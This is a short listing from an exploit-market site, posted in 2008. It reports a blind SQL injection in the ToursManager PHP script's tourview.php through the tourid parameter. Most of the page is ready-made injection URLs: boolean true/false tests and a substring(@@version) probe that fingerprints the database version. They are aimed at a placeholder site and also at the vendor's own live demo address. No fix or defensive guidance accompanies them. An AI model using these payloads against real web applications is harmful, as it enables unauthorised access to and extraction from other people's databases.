[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability

Author
XaDoS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4218
Category
web applications
Date add
20-11-2008
Platform
unsorted
====================================================================
ToursManager (tourview.php tourid) Blind SQL Injection Vulnerability
====================================================================



[>] Name:-->             ToursManager PhP Script <= Blind Sql Injection
 
[>] Discovered by:-->  XaDoS
 
[>] Site:-->                http://www.toursmanager.com
 
#########
 
[¦] ?XpLoIT:
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)
 
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0--   (false)
 
Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)
 
V=> 5.x.x XD
 
#########
[¦] D&M0:
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
 
|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5 
 
#########
 


#  0day.today [2024-11-16]  #